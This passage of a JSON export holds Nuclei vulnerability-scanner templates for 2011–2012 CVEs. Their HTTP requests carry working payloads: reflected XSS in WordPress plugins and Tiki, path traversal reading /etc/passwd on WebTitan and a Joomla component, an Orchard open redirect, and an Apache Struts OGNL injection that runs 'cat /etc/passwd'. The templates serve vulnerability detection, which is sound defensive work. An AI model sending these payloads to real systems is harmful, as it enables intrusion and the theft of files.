Groupware 7.0 is vulnerable to cross-site 
scripting via the GET \"ajax\" parameter to snarf_ajax.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4336\n - https://seclists.org/bugtraq/2011/Nov/140\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2011-4336\n cwe-id: CWE-79\n epss-score: 0.00255\n epss-percentile: 0.64746\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n tags: cve,cve2011,seclists,xss,tikiwiki,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950", "hash": "7876cff262fa23fe77a519079908e09b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eda" }, "name": "CVE-2011-4618.yaml", "content": "id: CVE-2011-4618\n\ninfo:\n name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Allows remote 
attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4618\n - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities\n - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/\n - http://www.openwall.com/lists/oss-security/2011/12/19/6\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4618\n cwe-id: CWE-79\n epss-score: 0.01913\n epss-percentile: 0.88293\n cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: simplerealtytheme\n product: advanced_text_widget_plugin\n google-query: inurl:\"/wp-content/plugins/advanced-text-widget\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_1, \"Advanced Text Widget\")'\n condition: and\n# digest: 4a0a0047304502200ae7d2b1eaa9716f2c9ca499a4059d499dc71155612efd70b3ff9ed1f9ab3a51022100a4febc922fbd52c77d48d4cfe79db3c53258501b17c1470e31c78df7a8c85308:922c64590222798bb761d5b6d8e72950", "hash": "5e94752b4958413c74b5bf3a5592e32a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edb" }, "name": "CVE-2011-4624.yaml", "content": "id: 
CVE-2011-4624\n\ninfo:\n name: GRAND FlAGallery 1.57 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4624\n - http://www.openwall.com/lists/oss-security/2011/12/23/2\n - http://plugins.trac.wordpress.org/changeset/469785\n - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4624\n cwe-id: CWE-79\n epss-score: 0.00431\n epss-percentile: 0.74018\n cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: codeasily\n product: grand_flagallery\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/flash-album-gallery\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Grand Flagallery'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n 
- 200\n# digest: 490a00463044022003c68f4509b734115cf058165538efe2647798f41c8ab2529c8a37ac87adf97502207f242403d316394c9ba49f4394fec2656568c19d07c6d98ce47089acb541779e:922c64590222798bb761d5b6d8e72950", "hash": "dab3553ed665e7a1fee03c911be75432", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edc" }, "name": "CVE-2011-4640.yaml", "content": "id: CVE-2011-4640\n\ninfo:\n name: WebTitan < 3.60 - Local File Inclusion\n author: ctflearner\n severity: medium\n description: |\n Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n reference:\n - https://www.exploit-db.com/exploits/37943\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4640\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2011-4640\n cwe-id: CWE-22\n cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n product: spamtitan\n vendor: spamtitan\n shodan-query: title:\"WebTitan\"\n tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated\n\nhttp:\n - raw:\n - |\n GET /login-x.php HTTP/1.1\n Host: {{Hostname}}\n\n - |\n POST /login-x.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n X-Requested-With: XMLHttpRequest\n\n jaction=login&language=en_US&username={{username}}&password={{password}}\n\n - |\n GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"success\\\":true\")'\n - 'contains(body_1, \"WebTitan\")'\n - \"regex('root:.*:0:0:', body)\"\n - 'status_code_3 == 200'\n condition: and\n# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950", "hash": "2bd88528ed9be059da1ecd5cd088d30c", 
"level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edd" }, "name": "CVE-2011-4804.yaml", "content": "id: CVE-2011-4804\n\ninfo:\n name: Joomla! Component com_kp - 'Controller' Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36598\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4804\n - http://foobla.com/news/latest/obsuggest-1.8-security-release.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-4804\n cwe-id: CWE-22\n epss-score: 0.0358\n epss-percentile: 0.9073\n cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: foobla\n product: com_obsuggest\n tags: cve,cve2011,lfi,edb,joomla,foobla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950", "hash": "beaa8977d8a337014fa70b5137d98e46", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ede" }, "name": "CVE-2011-4926.yaml", "content": "id: CVE-2011-4926\n\ninfo:\n name: 
Adminimize 1.7.22 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4926\n - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926\n - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5\n - http://www.openwall.com/lists/oss-security/2012/01/10/9\n - http://wordpress.org/extend/plugins/adminimize/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4926\n cwe-id: CWE-79\n epss-score: 0.01792\n epss-percentile: 0.86796\n cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: bueltge\n product: adminimize\n google-query: inurl:\"/wp-content/plugins/adminimize/\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Adminimize ==='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950", "hash": "c3a62e0a2cd15c11febf4d6c6b7a22b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edf" }, "name": "CVE-2011-5106.yaml", "content": "id: CVE-2011-5106\n\ninfo:\n name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5106\n - https://wordpress.org/plugins/flexible-custom-post-type/#developers\n - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type\n - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5106\n cwe-id: CWE-79\n epss-score: 0.00434\n epss-percentile: 0.7412\n cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fractalia\n product: flexible_custom_post_type\n google-query: inurl:\"/wp-content/plugins/flexible-custom-post-type/\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950", "hash": "35fb485476c0c8c113f375d1735728d6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee0" }, "name": "CVE-2011-5107.yaml", "content": "id: CVE-2011-5107\n\ninfo:\n name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5107\n - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5107\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.6058\n 
cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: alert_before_you_post\n google-query: inurl:\"/wp-content/plugins/alert-before-your-post\"\n tags: cve,cve2011,wordpress,xss,wp-plugin\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/alert-before-your-post/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100900756dfcc6df6c56c912725d923b0e4907624843873d7fbba36f386e808dab00220782a401d28335add23c3b2a288a4f7a0baaae8d70301ef86c098d36b36d5bc56:922c64590222798bb761d5b6d8e72950", "hash": "0481fbc9ef890ee573766e8ad4888993", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee1" }, "name": "CVE-2011-5179.yaml", "content": "id: CVE-2011-5179\n\ninfo:\n name: Skysa App Bar 1.04 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5179\n - 
https://exchange.xforce.ibmcloud.com/vulnerabilities/71486\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5179\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.61346\n cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: skysa\n product: skysa_app_bar_integration_plugin\n google-query: inurl:\"/wp-content/plugins/skysa-official/\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,skysa\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Skysa App'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a2506e8b9e69b40dd782552d8c266a500621c29093bcef9f8654764f7b7c87d0221008d4c442a6894e2c5eed83217df00622fc53439ae7005c6d5ecdef9bf9848c666:922c64590222798bb761d5b6d8e72950", "hash": "3c9676430e1594ef9942c065b9b763d4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee2" }, "name": "CVE-2011-5181.yaml", "content": "id: CVE-2011-5181\n\ninfo:\n name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to 
session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5181\n - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5181\n cwe-id: CWE-79\n epss-score: 0.00431\n epss-percentile: 0.71803\n cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: clickdesk\n product: clickdesk_live_support-live_chat_plugin\n google-query: inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'ClickDesk Live Support - Live Chat'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950", "hash": "26f44628f449e25b5c9a938a50c4b516", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee3" }, "name": "CVE-2011-5252.yaml", "content": "id: CVE-2011-5252\n\ninfo:\n name: Orchard 'ReturnUrl' Parameter URI - Open Redirect\n author: ctflearner\n 
severity: medium\n description: |\n Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n impact: |\n An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks.\n remediation: |\n Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities.\n reference:\n - https://www.exploit-db.com/exploits/36493\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5252\n - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110\n - http://orchard.codeplex.com/discussions/283667\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2011-5252\n cwe-id: CWE-20\n epss-score: 0.02536\n epss-percentile: 0.89931\n cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: orchardproject\n product: orchard\n tags: cve,cve2011,redirect,orchard,orchardproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a0047304502200b2fd44a350bfac8b9bac4f7f86aeb7a8019759723bee2617c7e051c86595fff022100dcf8de39a664b6126476f780592008d1e2b96bd8c83db51134cc0d55ceac2719:922c64590222798bb761d5b6d8e72950", "hash": "b3af48f0b902afd714b6554858e23940", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee4" }, "name": "CVE-2011-5265.yaml", "content": "id: CVE-2011-5265\n\ninfo:\n name: Featurific For WordPress 1.6.2 - Cross-Site Scripting\n author: 
daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5265\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5265\n cwe-id: CWE-79\n epss-score: 0.00478\n epss-percentile: 0.75288\n cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: featurific_for_wordpress_project\n product: featurific-for-wordpress\n google-query: inurl:\"/wp-content/plugins/featurific-for-wordpress\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Featurific For Wordpress'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# 
digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950", "hash": "35f87b00f768e403134ac5d3b9119d66", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee5" }, "name": "CVE-2012-0392.yaml", "content": "id: CVE-2012-0392\n\ninfo:\n name: Apache Struts2 S2-008 RCE\n author: pikpikcu\n severity: medium\n description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution on the affected server.\n remediation: Developers should immediately upgrade to at least Struts 2.3.18.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-008\n - https://blog.csdn.net/weixin_43416469/article/details/113850545\n - http://www.exploit-db.com/exploits/18329\n - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html\n - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393\n - http://struts.apache.org/2.x/docs/s2-008.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2012-0392\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.9496\n epss-percentile: 0.99239\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2012,apache,rce,struts,java,edb\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950", "hash": "2e7ab4cd0765e8ca7ca48fe1e3b9c857", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee6" }, "name": "CVE-2012-0394.yaml", "content": "id: CVE-2012-0394\n\ninfo:\n name: Apache Struts <2.3.1.1 - Remote Code Execution\n author: tess\n severity: medium\n description: |\n Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. 
